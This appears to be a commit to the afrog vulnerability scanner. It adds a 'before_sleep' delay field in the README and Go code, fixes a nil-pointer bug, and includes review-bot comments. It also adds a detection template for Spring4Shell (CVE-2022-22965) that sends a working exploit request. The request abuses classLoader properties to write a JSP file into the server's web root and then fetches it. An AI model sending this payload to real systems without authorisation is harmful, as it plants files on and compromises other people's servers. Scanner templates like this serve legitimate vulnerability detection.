  • add before_sleep & fix nil-pointer bug when appending results

  • zan8in committed 2 years ago
    05021584
    1 parent c1ed7efa
    afrog-pocs/README.md
    skipped 58 lines
    59 59   exppression: response.status == 200 && response.body.bcontains(b'PHP Version')
    60 60   stop_if_match: true
    61 61   r1:
     62 + before_sleep: 6
    62 63   request:
    63 64   method: GET
    64 65   path: /info.php
    skipped 17 lines
    82 83  stop_if_match: 如果匹配就停止
    83 84   
    84 85  stop_if_mismatch:如果不匹配就停止
     86 + 
     87 +before_sleep: 顾名思义,http 请求前 sleep 6 秒钟
    85 88   
    86 89  expression: 最外面的 `expression` 是 `rules` 的验证表达式,`r0() || r1()` 表示 `r0` 和 `r1` 两个规则,匹配一个表达式就为 `true`,代表漏洞存在。
    87 90   
    skipped 3 lines
    afrog-pocs/unreviewed/CVE-2022-22965.yaml
     1 +id: CVE-2022-22965
     2 + 
     3 +info:
     4 + name: Spring Framework RCE JDK 9+
     5 + author: zan8in
     6 + severity: critical
     7 + description: |
     8 + srping framework 结合JDK9及以上新版本的特性可以实现对历史漏洞补丁的绕过从而实现远程代码执行
     9 + Fofa: app="vmware-SpringBoot-Framework"
     10 + reference:
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-22965
     12 + 
     13 +set:
     14 + randTxt: randomInt(800000000, 1000000000)
     15 + exploitName: randomInt(800000000, 1000000000)
     16 +rules:
     17 + r0:
     18 + request:
     19 + method: POST
     20 + path: /
     21 + headers:
     22 + C2: "<%"
     23 + Suffix: "%>"
     24 + body: |
     25 + class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7BC2%7Di%20if(%22j%22.equals(%22j%22))%7B%20out.println(new%20String(%22{{randTxt}}%22))%3B%20%7D%25%7BSuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix={{exploitName}}&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
     26 + expression: response.status == 200
     27 + r1:
     28 + before_sleep: 6
     29 + request:
     30 + method: GET
     31 + path: /{{exploitName}}.jsp
     32 + expression: response.status == 200 && response.body.bcontains(b'{{exploitName}}')
     33 + 
     34 +expression: r0() && r1()
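--- a/pkg/core/checker.go
+++ b/pkg/core/checker.go
@@ -5,6 +5,7 @@
 "net/http"
 "net/url"
 "strings"
+"time"
 
 "github.com/google/cel-go/checker/decls"
 "github.com/zan8in/afrog/pkg/config"
@@ -75,6 +76,9 @@
 k := ruleMap.Key
 rule := ruleMap.Value
 
+if rule.BeforeSleep != 0 {
+time.Sleep(time.Duration(rule.BeforeSleep) * time.Second)
+}
 utils.RandSleep(500)
 
 isMatch := false
@@ -94,8 +98,14 @@
 c.UpdateVariableMap(rule.Output)
 }
 
-c.Result.AllPocResult = append(c.Result.AllPocResult,
-&PocResult{IsVul: isMatch, ResultRequest: c.VariableMap["request"].(*proto.Request), ResultResponse: c.VariableMap["response"].(*proto.Response)})
+pocRstTemp := PocResult{IsVul: isMatch}
+if c.VariableMap["response"] != nil {
+pocRstTemp.ResultResponse = c.VariableMap["response"].(*proto.Response)
+}
+if c.VariableMap["request"] != nil {
+pocRstTemp.ResultRequest = c.VariableMap["request"].(*proto.Request)
+}
+c.Result.AllPocResult = append(c.Result.AllPocResult, &pocRstTemp)
 
 if rule.StopIfMismatch && !isMatch {
 c.Result.IsVul = false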
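Review bot: The nil guards around the new result-append lines only catch a missing map entry; the type assertions `.(*proto.Response)` and `.(*proto.Request)` are still unchecked, so a value of any other type stored under those keys panics exactly as the old one-liner did. Use the comma-ok form for both, `if resp, ok := c.VariableMap["response"].(*proto.Response); ok { pocRstTemp.ResultResponse = resp }` and the matching line for `request`, so a bad entry yields an empty field instead of a crash. The new `before_sleep` branch sleeps for whatever number of seconds the PoC file declares with no upper bound, so a single template can stall a scan for an arbitrary time; consider capping it or stating the limit where the field is documented. If the enclosing loop carries a context, a `select` on `ctx.Done()` would let cancellation interrupt the wait, but the enclosing function starts and ends outside the hunk so that cannot be confirmed here.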
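--- a/pkg/poc/poc.go
+++ b/pkg/poc/poc.go
@@ -50,5 +50,6 @@
 Output yaml.MapSlice `yaml:"output"`
 StopIfMatch bool `yaml:"stop_if_match"`
 StopIfMismatch bool `yaml:"stop_if_mismatch"`
+BeforeSleep int `yaml:"before_sleep"`
 order int
 }
 
@@ -59,6 +60,7 @@
 Output yaml.MapSlice `yaml:"output"`
 StopIfMatch bool `yaml:"stop_if_match"`
 StopIfMismatch bool `yaml:"stop_if_mismatch"`
+BeforeSleep int `yaml:"before_sleep"`
 }
 
 // http/tcp/udp cache 是否使用缓存的请求,如果该选项为 true,那么如果在一次探测中其它脚本对相同目标发送过相同请求,那么便使用之前缓存的响应,而不发新的数据包
@@ -164,6 +166,7 @@
 r.Output = tmp.Output
 r.StopIfMatch = tmp.StopIfMatch
 r.StopIfMismatch = tmp.StopIfMismatch
+r.BeforeSleep = tmp.BeforeSleep
 r.order = order
 
 order += 1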
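Review bot: The new `BeforeSleep` field is declared in both rule structs (first and second hunks) and copied in the unmarshal hook without a comment giving its unit, so a reader of this file cannot tell whether the YAML value is seconds or milliseconds. Add `// BeforeSleep is the number of seconds to wait before this rule's request is sent; 0 means no delay.` above each declaration. Nothing in these hunks rejects a negative or very large value, so any bound the scanner intends to honour should be stated here or enforced where the field is consumed.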